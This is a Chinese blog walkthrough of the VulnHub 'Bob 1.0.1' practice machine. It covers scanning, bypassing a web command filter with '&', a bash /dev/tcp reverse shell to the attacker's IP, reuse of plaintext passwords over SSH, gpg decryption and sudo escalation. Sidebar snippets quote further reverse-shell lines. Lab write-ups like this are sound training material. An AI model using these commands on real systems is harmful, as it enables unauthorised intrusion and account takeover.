VulnHub:Bob 1.0.1靶机实战

最新推荐文章于 2024-07-25 10:17:36 发布
最新推荐文章于 2024-07-25 10:17:36 发布
阅读量769 收藏 26
点赞数 8
分类专栏: VulnHub 文章标签: 网络安全 安全 linux web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/140275397
版权

靶机搭建

靶机下载地址

1、信息收集

主机发现

攻击机ip为192.168.233.128,nmap扫描同网段存活主机。

nmap 192.168.233.0/24 -Pn -T4

靶机ip为192.168.233.133。

端口扫描

nmap 192.168.233.133 -A -p- -T4

开放了21,80,25468,其中ssh服务端口改到了25468。

目录扫描

访问http://192.168.233.133。是一个学校的门户网站。

在News页面下,第一条消息是一个提示,意思是上周一名黑客入侵了学校服务器,聘请了新的IT人员来帮助保护网络,已禁用外部登录,即学校主服务器只能在内部访问。

Contact Us页面列出了各部门各员工的电话和email,其中IT部门的Bob可能是管理员。

在Login页面提示外部登录已禁用。另外f12检查,Bob留言:如果您是新IT员工,我已给您发了一封信,告诉您可以使用的Web Shell。意思是我们要想办法用新IT员工的身份?

访问/passwords.html。也是Bob的一段留言,给内部人员说不要再有服务器上出现不安全文件的情况了,这是很愚蠢的一件事。

访问/robots.txt,出现新路径。

访问/dev_shell.php。是一个命令执行功能的页面,测试后发现存在过滤,并不是所有命令都可以被执行的,例如ls,pwd等命令是被禁止的。

尝试用管道符或者是特殊符号绕过过滤。这里通过管道符'|'列出当前目录下的文件,发现dev_shell.php.bak,即dev_shell.php的备份文件。

下载备份文件。可知不被允许执行的命令有:

访问/lat_memo.html。又是一段Bob留言,告诉我们服务器上存在一个没有保护的webshell。

2、web渗透

结合web页面的信息收集,我们知道服务器存在webshell,很明显dev_shell.php的命令执行是突破点,绕过过滤写入反弹shell。

# 攻击机开启监听
nc -lvvp 6767
​
# &符号绕过过滤
whoami & echo "bash -i >& /dev/tcp/192.168.233.128/6767 0>&1" | bash

监听上线。

进一步信息收集。切换到家目录,发现有四个用户,分别对应Contact Us页面中IT部门的四个工作人员。

bob

cat .old_passwordfile.html  

<html> <p> jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 </p> </html>

这是直接告诉了我们jc、seb账户的密码?

继续看看其他文件夹,到Documents目录下。

cat staff.txt根据内容翻译,大概是Bob对IT部门其他成员的看法。

login.txt.gpg这是一个经过gpg加密的文件,尝试解密。

gpg -d login.txt.gpg

报错,提示权限不够。

继续深入Secret文件夹,直到/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here发现一个可执行notes.sh文件。内容很乱,不知道想说什么。

其余三个用户目录均无内容。

3、ssh登录

目前有两个点没有解决,1、login.txt.gpg没有解开。2、notes.sh是什么意思。

解密login.txt.gpg时提示权限不够,这个账户没权限那就ssh登录到其他账户试试,前面告诉我们jc和seb账户的密码,试试。注意ssh端口是25468。

ssh jc@192.168.233.133 -p 25468
密码:Qwerty

解密login.txt.gpg文件。权限问题解决了但是密码不知道。

notes.sh应该是密码。百度发现密码就是notes.sh的藏头:HARPOCRATES

成功解密,得到Bob密码:b0bcat_

4、提权

登录Bob账户,想办法提权。sudo -l竟然是ALL,直接su root。

成功拿到root权限,找到flag.txt🎆

Aukum
关注
  • 8
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
bob靶机
weixin_52963334的博客
08-14 686
bob靶机实操
靶机渗透之BOb1
2301_76227305的博客
02-12 1420
反弹shell命令的使用解密命令的使用在这里理清一下用户这个玩意,一开始我们进入到home目录里面发现有三个用户。但现在我们是没有身份的,只能看一下普通的文件和执行一些普通的命令,这也是为啥我们一开始执行解密命令没权限。但我们发现jc用户的密码,登录jc用户获取身份了。那我们便就可以执行解密的命令,然后获取bob的密码。最后登录bob用户,发现bob用户在root组里面,可以变成root用户。那为啥jc不能变成root用户呢,因为它不在root组里面。
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1976
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 476
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
Bob靶机攻击记录
m0_56375711的博客
08-13 330
bob靶机攻占记录~
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
vue-source-code-analysis:Vue 1.0.1-vue source code
03-24
Vue 1.0.1 在Vue2.X上排名1.X版本没有用Flow进行类型检查,个人觉得看着没那么吃力(太懒);但是类型信息还是挺有用的,它能帮助我们更好的理解源码,Vue3。 0会用TypeScript 原始码调试: 直接链接到cdn的一个版本...
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 834
渗透入门初体验
Bob靶机游玩体验
WULI_KK的博客
01-08 428
这是一个十分好玩有趣且难度不高的渗透靶机拿取flag。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2985
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
暴打bob靶机
qq_41263192的博客
09-04 3575
实验环境: kali:192.168.126.130 bob靶机:192.168.126.129 一、信息收集 扫描目标ip地址 扫描目标主机的端口发现有80端口,尝试登录网页查看在网页中查找到了相关信息 大意是,学校网站被黑客攻击,之后将不能登录网站之类的。 在网站的联系我们中找到了关键词:admin,所以推测bob J有可能是管理员 扫描网站的目录,继续查看网站的其他子目录这里只有状态码为200的网页才可以正常查看 查看robots.txt 目录,发现其下的隐藏目录 二、getshell 继续查
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1124
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
Vulnhub靶机 bob
菜浪马废的博客
04-28 255
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1156
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Linux玩转指南
最新发布
qq_43535970的博客
07-25 871
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值